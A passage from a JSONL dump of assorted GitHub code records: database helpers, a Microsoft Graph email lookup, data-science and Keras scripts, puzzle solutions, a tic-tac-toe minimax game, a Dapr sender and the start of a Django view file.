db.query(Power).all()\n return rows if rows else []\n\n\ndef update_power(power_id: int, power: UpdatePower, db: Session) -> Power:\n power_data = _get_power_by_id(power_id, db)\n for var, value in power.dict(exclude_unset=True).items():\n setattr(power_data, var, value)\n db.commit()\n db.refresh(power_data)\n return power_data\n\n\ndef delete_power(power_id: int, db: Session) -> Power:\n power = _get_power_by_id(power_id, db)\n db.delete(power)\n db.commit()\n return power\n","repo_name":"jschmidt92/swade.io-older","sub_path":"api/db/repository/power.py","file_name":"power.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25507469231","text":"import json\nimport ast\nfrom botocore.vendored import requests\nfrom botocore.vendored.requests import *\n\ndef lambda_handler(event, context):\n r = requests.post('https://login.microsoftonline.com/67bff79e-7f91-4433-a8e5-c9252d2ddc1d/oauth2/v2.0/token',\n data = {\n 'grant_type': 'client_credentials',\n 'scope': 'https://graph.microsoft.com/.default',\n 'client_id': 'XXXXXX',\n 'client_secret': 'XXXXX'\n }\n )\n resp = r.json()\n print(resp)\n \n access_token = resp[\"access_token\"]\n \n email_list = []\n no_email_list = []\n \n user_list = [\"user_id_1\", \"user_id_2\", \"user_id_3\", \"user_id_4\", \"user_id_5\"]\n for user in user_list:\n r = requests.get(\"https://graph.microsoft.com/v1.0/users/?$filter=mailNickname eq '\"+user+\"'\", headers={'Authorization': 'Bearer '+ access_token})\n get_res = r.json()\n print(get_res)\n if len(get_res['value']) > 0:\n email_field = get_res['value'][0]['mail']\n email_list.append(email_field)\n \n else:\n print(\"No email found\")\n no_email_list.append(user)\n \n print(email_list)\n print(no_email_list)\n email_list = email_list.encode(\"utf-8\")\n email_list = ast.literal_eval(email_list)\n print(email_list)\n","repo_name":"ManudattaG/my_python_project","sub_path":"code/getEmail_from_MS_O365_api.py","file_name":"getEmail_from_MS_O365_api.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"7153531982","text":"import json\r\ndef registerJson(dados):\r\n with open(\"json.json\", 'r') as j:\r\n arrayCadastrados = json.loads(j.read())\r\n arrayCadastrados.append(dados)\r\n with open('json.json', 'w') as json_file:\r\n json.dump(arrayCadastrados, json_file,indent=4)\r\n\r\ndef alterJson(dados):\r\n with open('json.json', 'w') as json_file:\r\n json.dump(dados, json_file,indent=4)\r\n\r\ndef getTable():\r\n with open(\"json.json\", 'r') as j:\r\n contents = json.loads(j.read())\r\n return contents\r\n\r\n\r\n##Validação do registro\r\ndef valid_register(name,lastname,value):\r\n try:\r\n value = int(value)\r\n \r\n if type(name) == str and type(lastname) == str and type(value) == int:\r\n return True\r\n else:\r\n return False\r\n except:\r\n return False\r\n\r\n\r\ndef forPorcent():\r\n json = getTable()\r\n totalSum = 0\r\n ##Adicionando o numero de unidades totais\r\n for row in json:\r\n totalSum += int(row[\"participation\"])\r\n #Convertendo a lista em porcentagem\r\n for row in json:\r\n row[\"participation\"] = str(round(((int(row[\"participation\"])/totalSum)*100),2))+\"%\"\r\n return json\r\n\r\n","repo_name":"Doctorspeppers/desafioCotabox","sub_path":"funcoes.py","file_name":"funcoes.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34463671023","text":"import json\nimport urllib\nimport urllib2\nimport collections\nfrom datetime import datetime\nimport time\n\ndef getTempInfos(fromDate, toDate):\n #encode url parameter for get request\n params = urllib.urlencode({'from':fromDate, 'to':toDate})\n responseContent = urllib2.urlopen(\"http://url/OfficeTemp/ajax/getTempsByDate.php?\" + params)\n\n #load json response\n js = json.load(responseContent)\n\n #get current date\n todayTemp = time.strftime(\"%Y-%m-%d\")\n todayTemp = datetime.strptime(todayTemp, \"%Y-%m-%d\")\n\n #set start/end time for workday from 8am to 5pm\n workStart = todayTemp.replace(hour=8, minute=0)\n workEnd = todayTemp.replace(hour=17, minute=0)\n\n #declare variables for calculation\n entryCount = 0\n averageTemp = 0.0\n highestTemp = 0.0\n\n #loop throuth json objects 'Temps'\n for entry in js['Temps']:\n #convert date string to date object\n dateObject = datetime.strptime(entry['Date'], '%Y-%m-%d %H:%M:%S')\n\n #check if date is between start and end date\n if workStart < dateObject < workEnd:\n currentTemp = float(entry['Temp'])\n averageTemp += currentTemp\n entryCount += 1\n\n #determine highest temp\n if(currentTemp > highestTemp):\n highestTemp = currentTemp\n\n #determine average temp\n averageTemp /= entryCount\n averageTemp = round(averageTemp, 2)\n\n #create named tuple for return value\n tempInfo = collections.namedtuple('TempInfo', ['averageTemp', 'highestTemp'])\n tInfo = tempInfo(averageTemp, highestTemp)\n \n return tInfo\n","repo_name":"wasteland540/OfficeTemp","sub_path":"raspberryPi/GetTempInfo.py","file_name":"GetTempInfo.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31769501527","text":"\nimport math, copy, re, hashlib\nimport itertools as it\n# import lib for year 2020\nfrom lib import check_data, parse_row, has_all_fields\n\ndef rl(arr):\n\treturn range(len(arr))\n\ndef part_1(data):\n\n\tmax_id = 0\n\tmin_id = math.inf\n\tid_sum = 0\n\tfor i in data:\n\t\tcurr_id = int(i.replace(\"F\", \"0\").replace(\"B\", \"1\").replace(\"L\", \"0\").replace(\"R\",\"1\"), 2)\n\t\tid_sum += curr_id\n\t\tif curr_id > max_id:\n\t\t\tmax_id = curr_id\n\t\tif curr_id < min_id:\n\t\t\tmin_id = curr_id\n\tprint(max_id)\n\tprint('END OF PART1')\n\tpart_2(max_id, min_id, id_sum)\n\treturn\n\ndef ss(n):\n\treturn n * (n + 1) // 2\n\ndef part_2(max_id, min_id, id_sum):\n\n\tprint(ss(max_id) - ss(min_id - 1) - id_sum)\n\tprint('END OF PART2')\n\treturn \n\n\nif __name__ == '__main__':\n\twith open('05_input') as f:\n\t\tdata = f.read()\n\t\tdata = data.split('\\n')\n\t\t# data = list(map(int, data.split()))\n\n\n\tpart_1(copy.deepcopy(data))\n\t# part_2(copy.deepcopy(data))\n\t","repo_name":"PiErr0r/aoc","sub_path":"2020/05.py","file_name":"05.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"1860050573","text":"import time\nimport requests\nimport os\nimport logging\n\nlogging.basicConfig(level=logging.INFO,\n format='%(asctime)s %(levelname)s %(message)s')\n\nn = 0\n\nwhile True:\n n = (n + 1) % 1000000\n message = {\"msg\": \"Hello, World! \" + str(n)}\n\n logging.info(message)\n\n try:\n resp = requests.post(\n \"\"\"http://localhost:3500/v1.0/invoke/nodereceiver/method/greeting\"\"\", json=message)\n except Exception as e:\n logging.error(e)\n time.sleep(5)\n","repo_name":"gkgaurav31/dapr","sub_path":"dapr-with-kubernetes-quickstart/python_sender/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6500456596","text":"import pandas as pd\n# 资料的索引和选择\n\n# Series 中选择资料\ndata = pd.Series([0.25, 0.5, 0.75, 1.0], index = ['a', 'b', 'c', 'd'])\n# print(\"Data:\")\n# print(data)\n\n# 把Series当成字典(可以使用Python字典的操作方法/表达式)\n# print(\"data['b']: \", data['b'])\n# print(\"'a' in data: \", 'a' in data)\n# print(\"data.keys(): \", data.keys())\n# print(\"data.items(): \", list(data.items()))\n# 可以用字典的语法来对Series修改, data['e'] = 1.25\ndata['e'] = 1.25\n# print(\"Data:\")\n# print(data)\n\n# 把Series当成一维阵列(可以使用Numpy阵列的操作方式)\n# 指定索引切片\n# print(\"data['a':'c']: \\n\", data['a' : 'c'])\n# 整数索引切片\n# print(\"data[1:4]: \\n\", data[1:4])\n# 遮罩(mask)\n# print(\"data[(data > 0.4) & (data < 1.2)]: \\n\", data[(data > 0.4) & (data < 1.2)])\n# fancy索引\n# print(\"data[['a', 'e']]: \\n\", data[['a', 'e']])\n\n# indexer: loc, iloc, ix\n# 像是资料若使用整数当成每一列的标签, 使用整数索引或指定索引会出现一些问题或混淆\n# 因此Pandas提供了indexer属性, 在Series使用了loc, iloc, ix三种属性\ndata2 = pd.Series(['x', 'y', 'z'], index = [2, 3, 1])\n# print(\"Data2:\")\n# print(data2)\n\n# loc: 是让索引和切片总是以明确的索引为主(每一列的标签为主)\n# print(\"data2[1]: \", data2[1]) # ('y' or 'z')可能会混淆, 避免数据庞大时造成不必要的错误\n# print(\"data2.loc[1]: \", data2.loc[1]) # 'z'\n# print(\"data2.loc[2:3]: \\n\", data2.loc[2:3]) # 第1 2列\n\n# iloc: 让索引和切片总是以整数索引的方式为主(Python型态的整数索引, 起始值为0)\n# print(\"data2.iloc[0]: \", data2.iloc[0]) # 'x'\n# print(\"data2.iloc[1:3]: \\n\", data2.iloc[1:3]) # 第2 3列\n\n# ix是前两者的混合, 在DataFrame效果比较显著\n# 在Python程式码\"明确>隐晦\", 因此loc, iloc在维护简洁和易读十分有用(尤其在这个整数索引的例子)\n\n# DataFrame中选取资料\narea = pd.Series({'California' : 423967, 'Texas' : 695662, 'New York' : 141297,\n 'Florida' : 170312, 'Illinois' : 149995})\npop = pd.Series({'California' : 38332521, 'Texas' : 26448193, 'New York' : 19651127,\n 'Florida' : 19552860, 'Illinois' : 12882135})\n\ndata = pd.DataFrame({'Area' : area, 'Population' : pop})\n# print(\"Data:\")\n# print(data)\n\n# 把DataFrame当成字典\n# print(\"data['Area']: \\n\", data['Area'])\n# print(\"data.Population: \\n\", data.Population)\n# 注意: 不要把DataFrame的属性名称, 和Python字典的属性名称弄在一块\n# 下面程式码则是在DataFrame里面新增一行\ndata['density'] = data['Population'] / data['Area']\nprint(\"Data:\")\nprint(data)\n\n# 把DataFrame当成二维阵列\n# print(\"data.values: \\n\", data.values) # 取得DataFrame里面的所有值(没有标签)\n# print(\"data.T: \\n\", data.T) # 将DataFrame里面的资料做转置动作(Ex. 3x5 -> 5x3)\n\n# print(\"data.values[0]: \\n\", data.values[0]) # 选取第一列的所有值(没有标签)\n# print(\"data['Area']: \\n\", data['Area']) # 取得标签为Area的所有资料(有标签)\n# print(\"data['California']: \\n\", data['California']) # KeyError\n# line 73 (不能直接存取横列的标签) <- 因为使用Python字典语法(一键一值, 搜寻键)\n\n# indexer此时派上用场了, 利用他们来索取DataFrame的资料\n# print(\"data.iloc[:3, :2]: \\n\", data.iloc[:3, :2]) # 取得前3列和前2行的资料\n# print(\"data.loc[:'New York', :'Population']: \\n\", data.loc[:'New York', :'Population'])\n# line 77, 78是相同的结果; 且在上面有使用过, 接着使用ix\n\n# ix是可以将两种方式都混合起来使用(官方不推荐使用)\n# print(\"data.ix[:3, :'Population']: \\n\", data.ix[:3, :'Population']) # 执行结果也和上述两种相同\n# 当然也可以使用Mask或者fancy indexing操作\n# print(\"data.loc[data.density > 100, ['Population', 'density']]: \\n\", \n# data.loc[data.density > 100, ['Population', 'density']]) \n\n# 在原本的操作方法中, 也可以直接使用slice, index, mask\nprint(\"data['Texas' : 'Illinois']: \\n\", data['Texas' : 'Illinois'])\nprint(\"data[1:5]: \\n\", data[1:5])\nprint(\"data[data.density >= 90]: \\n\", data[data.density >= 90])\n# 这种似于Numpy操作虽然不能很精准符合Pandas的操作, 但实务上非常有用","repo_name":"Sapphire0912/Programming","sub_path":"Python/Practice/Data Science/Pandas_Module/pandas_indexselect.py","file_name":"pandas_indexselect.py","file_ext":"py","file_size_in_byte":4232,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13973932956","text":"import enchant\r\nimport string\r\nimport random\r\n\r\nstring.ascii_lowercase\r\n'abcdefghijklmnopqrstuvwxyz'\r\n\r\nwordguess = \"\"\r\nknownlet = \"\"\r\nd = enchant.Dict(\"en_US\")\r\nprint(\"Try Donut and Raise as the first two words, then respond with any green letters, substitute any unkown letters with ?. For example: '?E??R'\")\r\ninput1 = input()\r\nprint(\"what are the out of place letters?\")\r\ninput2 = input()\r\nletternum = 0\r\n\r\nfor v in input1:\r\n if v != \"?\":\r\n knownlet += str(v)\r\n\r\nfor x in input2:\r\n if x != \"?\":\r\n knownlet += str(x)\r\n\r\nprint(\"known letters:\")\r\nprint(knownlet)\r\n\r\ne = 1\r\n\r\nguesses = []\r\n\r\nprint(\"-- SOLVING --\")\r\n\r\nwhile e in range(1,13000):\r\n hasallknownlet = True\r\n for i, w in enumerate(input1):\r\n if w == \"?\":\r\n randomlet = random.choice(string.ascii_lowercase)\r\n # print(randomlet)\r\n wordguess += randomlet\r\n else:\r\n # print(str(w))\r\n wordguess += str(w)\r\n # print(e)\r\n # print(wordguess)\r\n for f in knownlet:\r\n if (f in wordguess) == False:\r\n hasallknownlet = False\r\n if hasallknownlet:\r\n if (wordguess in guesses) == False:\r\n if d.check(wordguess):\r\n # print(wordguess)\r\n # print(\"hi\")\r\n guesses.append(wordguess)\r\n e += 1\r\n print(wordguess)\r\n wordguess = \"\"\r\n # e += 1\r\nprint(\"-- FINISHED --\")\r\nprint(guesses)\r\n\r\n# print(wordguess)\r\n","repo_name":"couchpotatochip21/wordlesolver","sub_path":"wordle.py","file_name":"wordle.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33727953269","text":"\n#this will not work well with string that have duplicates.\n# time cpmplexity : O(n*n!) \n# this algorith m does not work great with long instances,\n# altouhgh an example like baaaaaaaaaaaa , despite its large size, but can only \n#produce 13 unique permuatation, that should not nommarly take too long.\n# the reason for it taking too long is that the alg is trying to generate all permuatations and \n# then remove those that are identical.\n\n# how can we generate non-identical ones only.\n\ndef allPermutations(strng):\n if len(strng) ==1:\n return [strng]\n perm_list = []\n #for i in set(strng):\n # smallerStr = strng.replace(i,\"\")\n for idx, i in enumerate(strng):\n if strng.count(i) == len(strng):\n perm_list = [strng]\n continue\n \n \n #smallerStr = strng.replace(i,\"\",1)\n #smallerStr = strng[:idx] + strng[idx+1:]\n #print(smallerStr)\n smallerStr = strng[:idx]+strng[idx+1:]\n z = allPermutations(smallerStr)\n for t in z:\n if not (i+t) in perm_list:\n perm_list.append(i+t)\n \n return perm_list\n\nprint(allPermutations(\"baaaaa\"))\n","repo_name":"rampedro/Cracking-the-coding-interview-leetcode","sub_path":"permut.py","file_name":"permut.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71159493314","text":"import os\nfrom keras.applications import ResNet50, VGG16\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras import optimizers, callbacks\nfrom keras.models import Sequential\nfrom keras.layers import Input, Dropout, Flatten, Dense\nfrom keras.models import Model\nimport argparse\nimport tensorflow as tf\nimport numpy as np\nimport glob\n\nN_classes = 3\n\ndef assert_validity(args):\n valid_models = ['resnet50', 'vgg16', 'vgg19', 'inception_v3', 'xception']\n valid_groups = [\n 'F_Ped', 'M_ped',\n 'F_YA', 'M_YA',\n 'F_Adult', 'M_Adult',\n 'F_Ger', 'M_Ger']\n\n assert args.model in valid_models, '{} not a valid model name'.format(args.model)\n assert args.group in valid_groups, '{} not a valid group'.format(args.group)\n\n\ndef prep_dir(args):\n group, model = args.group, args.model\n model_path = 'models/' + group + '/' + model + '/'\n if not os.path.exists(model_path):\n os.mkdir('models')\n os.mkdir('models/'+group)\n os.mkdir(model_path)\n return model_path\n\n\ndef get_base_model(model):\n if model == 'resnet50':\n base_model = ResNet50(weights='imagenet', include_top=False,\n input_tensor=Input(shape=(224, 224, 3)))\n\n elif model == 'vgg16':\n base_model = VGG16(\n weights='imagenet',\n include_top=False,\n input_tensor=Input(shape=(224, 224, 3)))\n\n # elif model == 'vgg19':\n # base_model = applications.vgg19.VGG19(\n # weights='imagenet',\n # include_top=False,\n # input_tensor=input_tensor)\n # elif model == 'inception_v3':\n # base_model = applications.inception_v3.InceptionV3(\n # weights='imagenet',\n # include_top=False,\n # input_tensor=input_tensor)\n # elif model == 'xception':\n # base_model = applications.xception.Xception(\n # weights='imagenet',\n # include_top=False,\n # input_tensor=input_tensor)\n else:\n print('You should not be here')\n\n return base_model\n\n\ndef one_hot_labels(labels):\n one_hot = np.zeros((labels.size, N_classes))\n one_hot[np.arange(labels.size), labels] = 1\n return one_hot\n\n\ndef count_files(directory):\n \"\"\"Get number of files by searching directory recursively\"\"\"\n if not os.path.exists(directory):\n return 0\n cnt = 0\n for r, dirs, files in os.walk(directory):\n for dr in dirs:\n cnt += len(glob.glob(os.path.join(r, dr + \"/*\")))\n return cnt\n\n\ndef get_callbacks(model, group):\n \"\"\"\n :return: A list of `keras.callbacks.Callback` instances to apply during training.\n\n \"\"\"\n path = 'models/' + group + '/' + model + '/'\n return [\n callbacks.ModelCheckpoint(\n filepath=path+'weights.{epoch:02d}-{val_loss:.2f}.hdf5',\n monitor='val_acc',\n verbose=1,\n save_best_only=True),\n callbacks.EarlyStopping(\n monitor='val_loss',\n patience=12,\n verbose=1),\n callbacks.ReduceLROnPlateau(\n monitor='val_loss',\n factor=0.6,\n patience=2,\n verbose=1),\n # callbacks.LambdaCallback(on_epoch_end=on_epoch_end),\n callbacks.TensorBoard(\n log_dir='TBlog/',\n histogram_freq=4,\n write_graph=True,\n write_images=True)\n ]\n\n\ndef generate_bn_features(model, group):\n model = get_base_model(model)\n train_path = 'data/train_224x224/' + group + '/train/'\n test_path = 'data/train_224x224/' + group + '/test/'\n batch_size = Batch_size\n n_steps_train = np.ceil(count_files(train_path) / batch_size)\n n_steps_test = np.ceil(count_files(test_path) / batch_size)\n datagen = ImageDataGenerator(rescale=1./255)\n\n train_generator = datagen.flow_from_directory(\n directory=train_path,\n target_size=(224, 224),\n batch_size=Batch_size,\n class_mode='categorical',\n shuffle=False)\n bottleneck_features_train = model.predict_generator(\n generator=train_generator,\n steps=n_steps_train,\n workers=4,\n verbose=1)\n np.save('models/' + group + '/bottleneck_features_train',\n bottleneck_features_train)\n np.save('models/' + group + '/train_classes', train_generator.classes)\n\n test_generator = datagen.flow_from_directory(\n directory=test_path,\n target_size=(224, 224),\n batch_size=Batch_size,\n class_mode='categorical',\n shuffle=False)\n bottleneck_features_test = model.predict_generator(\n generator=test_generator,\n steps=n_steps_test,\n workers=4,\n verbose=1)\n np.save('models/' + group + '/bottleneck_features_test',\n bottleneck_features_test)\n np.save('models/' + group + '/test_classes', test_generator.classes)\n\n\ndef train_top_only(model, group):\n base_model = get_base_model(model)\n weights_path = 'models/' + group + '/' + model + '/bottleneck_fc_model.h5'\n train_data = np.load('models/' + group + '/bottleneck_features_train.npy')\n train_labels = one_hot_labels(\n np.load('models/' + group + '/train_classes.npy'))\n test_data = np.load('models/' + group + '/bottleneck_features_test.npy')\n test_labels = one_hot_labels(\n np.load('models/' + group + '/test_classes.npy'))\n\n top_model = Sequential()\n top_model.add(Flatten(input_shape=base_model.output_shape[1:]))\n top_model.add(Dense(256, activation='relu', name='fcc_0'))\n top_model.add(Dropout(0.5))\n top_model.add(Dense(N_classes, activation='softmax', name='class_id'))\n print('Model bottom loaded.')\n\n top_model.compile(\n optimizer='SGD',\n loss='categorical_crossentropy',\n metrics=['accuracy'])\n\n print('Please input top training parameters: \\n')\n Batch_size = input('Batch size: ')\n N_Epochs = input('Epochs:')\n\n top_model.fit(\n x=train_data,\n y=train_labels,\n epochs=N_Epochs,\n batch_size=Batch_size,\n validation_data=(test_data, test_labels),\n callbacks=get_callbacks(),\n verbose=1)\n\n top_model.save_weights(weights_path)\n print('Model top trained.')\n\n\ndef fine_tune(model, group):\n\n weights_path = 'models/' + group + '/' + model + '/bottleneck_fc_model.h5'\n train_path = 'data/train_224x224/' + group + '/train/'\n test_path = 'data/train_224x224/' + group + '/test/'\n\n N_train_samples = count_files(train_path)\n N_test_samples = count_files(test_path)\n\n base_model = get_base_model(model)\n print('Model bottom loaded.')\n top_model = Sequential()\n top_model.add(Flatten(input_shape=base_model.output_shape[1:]))\n top_model.add(Dense(256, activation='relu', name='fcc_0'))\n top_model.add(Dropout(0.5))\n top_model.add(Dense(N_classes, activation='softmax', name='class_id'))\n top_model.load_weights(weights_path)\n full_model = Model(inputs=base_model.input,\n outputs=top_model(base_model.output))\n\n print('Please input fine-tuning parameters: \\n')\n Batch_size = input('Batch size: ')\n N_Epochs = input('Epochs:')\n N_layers_to_finetune = input('# of last layers to finetune:')\n\n for layer in full_model.layers[-N_layers_to_finetune:]:\n layer.trainable = False\n for layer in full_model.layers[:-N_layers_to_finetune]:\n layer.trainable = True\n\n full_model.compile(loss='categorical_crossentropy',\n optimizer=optimizers.SGD(lr=1e-4, momentum=0.9),\n metrics=['accuracy'])\n\n datagen = ImageDataGenerator(\n rescale=1. / 255,\n )\n\n train_generator = datagen.flow_from_directory(\n train_path,\n target_size=(224, 224),\n batch_size=Batch_size,\n class_mode='categorical',\n shuffle=True)\n\n test_generator = datagen.flow_from_directory(\n test_path,\n target_size=(224, 224),\n batch_size=Batch_size,\n class_mode='categorical',\n shuffle=True)\n\n # fine-tune the model\n full_model.fit_generator(\n generator=train_generator,\n steps_per_epoch=np.ceil(N_train_samples / Batch_size),\n epochs=N_epochs,\n verbose=1,\n callbacks=get_callbacks(model, group),\n validation_data=test_generator,\n validation_steps=np.ceil(N_test_samples / Batch_size),\n class_weight=None,\n max_q_size=10,\n workers=4,\n pickle_safe=False,\n initial_epoch=0)\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--model', default='resnet50',\n help='The network eg. resnet50')\n parser.add_argument('--group', default='F_Adult', help='Demographic group')\n parser.add_argument('--generate_bn_features', action='store_true',\n help='Flag to generate bottleneck features')\n parser.add_argument('--train_top_only',\n action='store_true', help='Flag to retrain')\n parser.add_argument('--finetune', action='store_true',\n help='Flag to fine tune')\n\n args = parser.parse_args()\n\n assert_validity(args)\n model_path = prep_dir(args)\n bn_features_path = model_path + 'bottleneck_features_train.npy'\n weights_path = model_path + 'bottleneck_fc_model.h5'\n\n if args.generate_bn_features:\n generate_bn_features(model, group)\n\n if args.train_top_only:\n if not os.path.exists(bn_features_path):\n print('Bottleneck features file not found! Generate first.')\n else:\n train_top_only(model, group)\n\n if args.finetune:\n if not os.path.exists(weights_path):\n print('Weights file not found! Train top first.')\n else:\n print('Fine tuning:')\n fine_tune(model, group)\n\n if not args.train_top_only and not args.fine_tune:\n print('No retraining selected.')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"YaronBlinder/tensorflow_transferlearning_finetuning","sub_path":"work.py","file_name":"work.py","file_ext":"py","file_size_in_byte":9897,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"39928193452","text":"WINNING_BOARD_CONFIGURATIONS = [(0, 1, 2), (3, 4, 5), (6, 7, 8), (0, 3, 6), (1, 4, 7), (2, 5, 8), (0, 4, 8), (2, 4, 6)]\n\n\ndef board_print(board_list):\n print(\"-------------\")\n print(\"| \" + board_list[0] + \" | \" + board_list[1] + \" | \" + board_list[2] + \" |\")\n print(\"-------------\")\n print(\"| \" + board_list[3] + \" | \" + board_list[4] + \" | \" + board_list[5] + \" |\")\n print(\"-------------\")\n print(\"| \" + board_list[6] + \" | \" + board_list[7] + \" | \" + board_list[8] + \" |\")\n print(\"-------------\")\n\n\ndef check_winner(board_list):\n for combo in WINNING_BOARD_CONFIGURATIONS:\n combo_square1 = combo[0]\n combo_square2 = combo[1]\n combo_square3 = combo[2]\n if board_list[combo_square1] == board_list[combo_square2] == board_list[combo_square3] != \" \":\n return board_list[combo_square1]\n return None\n\n\ndef evaluate_board(board_list, symbol):\n winner = check_winner(board_list)\n \n if winner == \"X\":\n # Computer won\n return 1\n elif winner == \"O\":\n # Human won\n return -1\n \n if \" \" not in board_list:\n # Game tied\n return 0\n \n if symbol == \"X\":\n best_outcome = 1\n \n for index, square in enumerate(board_list):\n if square == \" \":\n board_list[index] = \"O\"\n outcome = evaluate_board(board_list, \"O\")\n board_list[index] = \" \"\n\n if outcome < best_outcome:\n best_outcome = outcome\n\n return best_outcome\n else:\n best_outcome = -1\n \n for index, square in enumerate(board_list):\n if square == \" \":\n board_list[index] = \"X\"\n outcome = evaluate_board(board_list, \"X\")\n board_list[index] = \" \"\n\n if outcome > best_outcome:\n best_outcome = outcome\n\n return best_outcome\n\n\ndef choose_computer_move(board_list, available_squares): \n best_move = available_squares[0]\n best_outcome = -1\n \n for square in available_squares:\n board_list[int(square) - 1] = \"X\"\n outcome = evaluate_board(board_list, symbol)\n board_list[int(square) - 1] = \" \"\n \n if outcome > best_outcome:\n best_move = square\n best_outcome = outcome\n \n return best_move\n\n\n# Starting the game\nboard_list = [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"]\nprint(\"Are you ready to play tic tac toe?\")\nboard_print(board_list)\n\nsymbol = \"O\"\ngame_over = False\navailable_squares = [\"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\"]\nturn_count = 0\nwhile not game_over:\n turn_count = turn_count + 1\n # symboling the board\n print(\"It's \" + symbol + \"'s turn!\")\n\n if symbol == \"O\":\n # Human players turn\n chosen_square = input(\"Where do you want to play? \")\n\n while chosen_square not in available_squares:\n print(\"That square is not available! Please try again.\")\n print(\"The available squares are:\", available_squares)\n chosen_square = input(\"Where do you want to play? \")\n else:\n # Computer players turn\n chosen_square = choose_computer_move(board_list, available_squares)\n\n available_squares.remove(chosen_square)\n square_index = int(chosen_square) - 1\n board_list[square_index] = symbol\n\n board_print(board_list)\n print(\"Computer's evaluation of the current board:\", evaluate_board(board_list, symbol))\n\n # Checking the winner\n game_won = check_winner(board_list)\n if game_won:\n print(\"The winner is \" + game_won + \" !\")\n game_over = True\n elif turn_count == 9:\n print(\"It's a tie!\")\n game_over = True\n\n # Taking turns\n if symbol == \"O\":\n symbol = \"X\"\n elif symbol == \"X\":\n symbol = \"O\"\n\n\n","repo_name":"aptkim/gpn-tictactoe","sub_path":"kim_adv_tictactoe.py","file_name":"kim_adv_tictactoe.py","file_ext":"py","file_size_in_byte":3820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23378070731","text":"#!/usr/bin/env python3\n\ndef check(seq):\n mark = \"\"\n for c in seq:\n if c == \".\": return \"\"\n elif c != \"T\":\n if mark:\n if c != mark: return \"\"\n else: mark = c\n return mark\n\ndef status(board):\n for i in range(4):\n c = check(board[(4*i):(4*i + 4)])\n if c: return \"{0} won\".format(c)\n\n for i in range(4):\n c = check(board[i::4])\n if c: return \"{0} won\".format(c)\n\n c = check(board[0::5])\n if c: return \"{0} won\".format(c)\n c = check(board[3:13:3])\n if c: return \"{0} won\".format(c)\n if \".\" in board: return \"Game has not completed\"\n return \"Draw\"\n\nfin = open(\"A-large.in\", \"r\")\nfout = open(\"A-large.out\", \"w\")\n\nT = int(fin.readline())\n\nfor t in range(1, T + 1):\n board = \"\"\n for _ in range(4): board += fin.readline().rstrip()\n fout.write(\"Case #{0}: {1}\\n\".format(t, status(board)))\n fin.readline()\n\nfin.close()\nfout.close()\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_116/1043.py","file_name":"1043.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70004181954","text":"#输入:x = 123\n#输出:321\n\n\ndef reverse(x):\n rev=0\n\n while x !=0:\n\n dight=x%10\n #Python3 的取模运算在 x 为负数时也会返回 [0, 9) 以内的结果,因此这里需要进行特殊判断\n if x<0 and dight >0:\n dight-=10\n x=(x-dight)//10\n rev=rev*10+dight\n\n return rev\n\nprint(reverse(-12))","repo_name":"shujing994/studyProject","sub_path":"整数反转.py","file_name":"整数反转.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43839536836","text":"##Integrantes: JonathanCoronel y Leonardochj\nx = float(input(\"Ingresar la coordenada x: \"))\ny = float(input(\"Ingrese la coordenada y: \"))\n\nif (x >= 0) and (y >= 0):\n cuadrante = \"primer cuadrante\"\nif (x <= 0) and (y >= 0):\n cuadrante = \"segundo cuadrante\"\nif (x <= 0) and (y <= 0):\n cuadrante = \"tercer cuadrante\"\nif (x >= 0) and (y <= 0):\n cuadrante = \"cuarto cuadrante\"\n\nprint(\"Esta ubicado en el\", cuadrante)\n","repo_name":"IntroProgramacion-P-Oct21-Feb22/trabajofinal-primer-bim-JonathanCoronel","sub_path":"problema05/sol_python/problema05.py","file_name":"problema05.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5146536428","text":"from django.contrib.auth import authenticate, login, logout\nfrom django.db import IntegrityError\nfrom django.http import HttpResponse, HttpResponseRedirect, JsonResponse\nfrom django.shortcuts import render\nfrom django.urls import reverse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.paginator import Paginator\nimport json\n\nfrom .models import User, Post, Comment, Follow, Like\n\ndef index(request):\n if (request.user.is_authenticated):\n return render(request, \"network/index.html\")\n else:\n return HttpResponseRedirect(reverse(\"login\"))\n\n\ndef login_view(request):\n if request.method == \"POST\":\n\n # Attempt to sign user in\n username = request.POST[\"username\"]\n password = request.POST[\"password\"]\n user = authenticate(request, username=username, password=password)\n\n # Check if 